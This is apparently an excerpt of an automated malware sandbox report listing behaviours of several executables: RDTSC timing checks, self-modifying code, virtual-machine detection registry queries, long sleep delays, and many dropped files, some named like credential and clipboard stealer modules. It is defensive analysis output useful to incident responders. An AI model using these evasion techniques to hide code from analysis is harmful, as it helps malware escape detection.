Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe RDTSC instruction interceptor: First address: AF7457 second address: AF7481 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 popad 0x00000008 jnp 00007F0D755569FCh 0x0000000e push ecx 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 jmp 00007F0D755569E4h 0x00000016 pop ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe RDTSC instruction interceptor: First address: AF7481 second address: AF7485 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe RDTSC instruction interceptor: First address: AF78AC second address: AF78B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe RDTSC instruction interceptor: First address: AF7B2A second address: AF7B3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push edi 0x00000006 push edi 0x00000007 pop edi 0x00000008 jnc 00007F0D75558556h 0x0000000e pop edi 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe RDTSC instruction interceptor: First address: AF7B3F second address: AF7B48 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Special instruction interceptor: First address: 67ED86 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Special instruction interceptor: First address: 821255 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Special instruction interceptor: First address: 81FCCE instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Special instruction interceptor: First address: 67C582 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Special instruction interceptor: First address: 826705 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Special instruction interceptor: First address: 8AA845 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Special instruction interceptor: First address: 99ED86 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Special instruction interceptor: First address: B41255 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Special instruction interceptor: First address: B3FCCE instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Special instruction interceptor: First address: 975256 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Special instruction interceptor: First address: 99C582 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Special instruction interceptor: First address: B46705 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Special instruction interceptor: First address: B9599A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Special instruction interceptor: First address: BCA845 instructions caused by: Self-modifying code
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Special instruction interceptor: First address: 895256 instructions caused by: Self-modifying code
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Special instruction interceptor: First address: AB599A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Special instruction interceptor: First address: A25256 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Special instruction interceptor: First address: C4599A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1000066001\swiiiii.exe Memory allocated: 2BD0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000066001\swiiiii.exe Memory allocated: 2C90000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000066001\swiiiii.exe Memory allocated: 4C90000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe Memory allocated: 1180000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe Memory allocated: 2CB0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe Memory allocated: 2AB0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000073001\swiiii.exe Memory allocated: 11A0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000073001\swiiii.exe Memory allocated: 2CB0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000073001\swiiii.exe Memory allocated: 2AE0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000075001\file300un.exe Memory allocated: 1F3F4990000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1000075001\file300un.exe Memory allocated: 1F3F62B0000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: 12B0000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: 2AB0000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: 4AB0000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: 7200000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: 8200000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: 8390000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: 9390000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: 97F0000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: B070000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: C470000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: 97B0000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: D470000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: E470000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: EAA0000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: FAA0000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: 8300000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Memory allocated: 9500000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe Code function: 7_2_05010B4F rdtsc 7_2_05010B4F
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Thread delayed: delay time: 180000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1000073001\swiiii.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 600000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 599675
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 597269
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 596933
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 300000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 596417
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 596128
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 595880
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 595737
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 595611
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 595269
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 592613
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 592174
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 591863
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 591362
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 588551
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 587988
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 587538
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 587006
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 586598
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 584013
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 583347
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 582588
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 579810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 579036
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 578371
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 574082
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 573153
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 572475
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 571559
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 570854
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 570174
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 569384
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 568678
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 291318
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Window / User API: threadDelayed 1173
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Window / User API: threadDelayed 1141
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Window / User API: threadDelayed 1144
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Window / User API: threadDelayed 1326
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Window / User API: threadDelayed 944
Source: C:\Users\user\1000021002\ac861238af.exe Window / User API: threadDelayed 662
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Window / User API: threadDelayed 2567
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Window / User API: threadDelayed 2264
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Window / User API: threadDelayed 2236
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Window / User API: threadDelayed 2236
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Window / User API: threadDelayed 4717
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Window / User API: threadDelayed 4830
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9256
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Window / User API: threadDelayed 830
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Window / User API: threadDelayed 2276
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Window / User API: threadDelayed 2299
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Window / User API: threadDelayed 2268
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Window / User API: threadDelayed 2284
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 356
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\Pictures\X53t1QSznpDGsvX2qLbdQFD1.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Osh3JGbyB69u4I6NltayynfD.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\Pictures\gX4d2ArXDOHTjofk9CfRb7Jz.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\Pictures\5nFKWr1EKUheiDEHo671vxm8.exe
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\clip64[1].dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\QbkKvIT5uJj3Cx8h0ECIsmUK.exe
Source: C:\Users\user\AppData\Local\Temp\u6po.0.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dll
Source: C:\Users\user\AppData\Local\Temp\1000234001\ISetup8.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\u6po.2\ASUS_WMI.dll
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\install[1].exe
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\gold[1].exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\Pictures\MtYY7PxoMVCDp1NJbYQga2LV.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\Pictures\jzMGE9Xb2Ny8jtCWlXWAk3ap.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\Pictures\de4IGlGSbV9c3J4m0qZtBGm8.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\9WrQ2c2u5fxH1pcvCwwjGhdd.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\aYtr3HT3BUqjK6QB6WYpwCcm.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\Pictures\zWIy5Pdf1kgq9YulaqIKrGGy.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\Pictures\JcuJCrKoIRAAJIb94uRnhVjr.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\gPQjkT7jjoMSIv7cXyWMW1C4.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Z0V3bHdPFsglc9f9uLbxOZFN.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\leqbtljZtxj2WxVvdmpHiNsI.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\9SmQs0R4T5RJUISklvcv02zp.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\Pictures\ppcQqLgPI8Dyy7YykX33fm5x.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\Pictures\S41vy8IsPU7Iudry37c4uNtg.exe
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1000081001\install.exe
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1000236001\4767d2e713f2021e8fe856e3ea638b58.exe
Source: C:\Users\user\AppData\Local\Temp\1000234001\ISetup8.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\u6po.2\AsIO.dll
Source: C:\Users\user\AppData\Local\Temp\u6po.0.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll
Source: C:\Users\user\AppData\Local\Temp\5454e6f062\explorta.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\sarra[1].exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\C893DEcM3dAA247WrHBz1SDW.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\CmCQsbfi77SnYQWckHTzUjRg.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\oqwWhViccQzmDvkS751EZRiG.exe
Source: C:\Users\user\AppData\Local\Temp\1000234001\ISetup8.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\u6po.2\ATKEX.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\laQhqKepZhfkS5rQoYOvKJAy.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\Pictures\g81RdhkO8Pp47pz1l8siHWuN.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\Pictures\pScZMSZH0uu2OkUDvWpN2tuz.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\dmmb0z6yJ22pC75a4y49Nfob.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\mBoc1pbzy7gOQT20pyEZL3en.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\Pictures\STUD4CnDuvZtXsKBuBkO31id.exe
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\jfesawdr[1].exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\Pictures\1NXbTL9dcUCk55eVv5KRJhmL.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\Pictures\oXA3lyE6zGyLyvw1CwVKpLsf.exe
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\cred64[1].dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\iO9tAKw78L31Wsbvnq5kt5m1.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\Pictures\M4OBi0ywNcuUZRFLcfJ70nUH.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\Pictures\gmHwlMZnGawtAwStcAU6D1RM.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\8sXk5E4IG9n4ZHu2M9Littnp.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\NN7y6Ml4QHJBCfpeCmt1XQq3.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\f2NBhcBIObRGHagt6xPQoMa2.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\Pictures\gjVUxsTFUgOAjApkeCU52nGD.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\Pictures\rVg8HtIzXa4xhJHL7Pn8A6d2.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Bkg8NSHXvizTVBsjT3dzRvci.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\Pictures\0co9idnjzay1KSn3DMfCsBSw.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\ULDq5mjQ4b5aNI3V4eIJfMVS.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\Pictures\v6zcDFD3cRDhmr34kNKDn8tX.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\GIz2DLitsyoTn14REJti2nqN.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\evHtDP9yDvs3XYDQg8lqEVoH.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\Pictures\Jr1vIs8XqAmt0RT7bHMte8ts.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\Pictures\qPQ3lJ1fN9DRgfiXtyMpf1ll.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\gKIISy7hixfPFGDeeM7cQzit.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Aghrmi42Lz5QvS8u8U6BiVXQ.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\Pictures\SjGlviky3CjPwV1vWXl2gdhJ.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\Pictures\D7t23m0X26bEkZqkCQtNwK5Y.exe
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\Pictures\s8YO7ScTlLADC9Vt6wr10aY4.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\Pictures\11xbcpylNeYY4tZ39QN34xGC.exe
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1000079001\gold.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\iFyHzFXRkeOppMlu3FtGrLYy.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\Pictures\QcyIEuk7gD7wTlhElB94jgu9.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\Pictures\tAKreBGDuozTwXSZfhU7cFT3.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\PHoZl3WswCZ1lCRWCJPBFZtN.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\Pictures\pl49PSFkcWVTQqBe8TA2VhRW.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\Pictures\3N5jWnvXHqfYUsxTijnW3Uc5.exe
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\alexxxxxxxx[1].exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\H3bqnZf96LFIOlogieo3h5K9.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\Pictures\7iI5SUAnqRGyB1YdSAO06W1v.exe
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\4767d2e713f2021e8fe856e3ea638b58[1].exe
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1000077001\jfesawdr.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\gzxs1MlpU5tnMfkC7kzgvR1h.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\i8dOWYOLtbNAxDJGOQ8Wt9el.exe
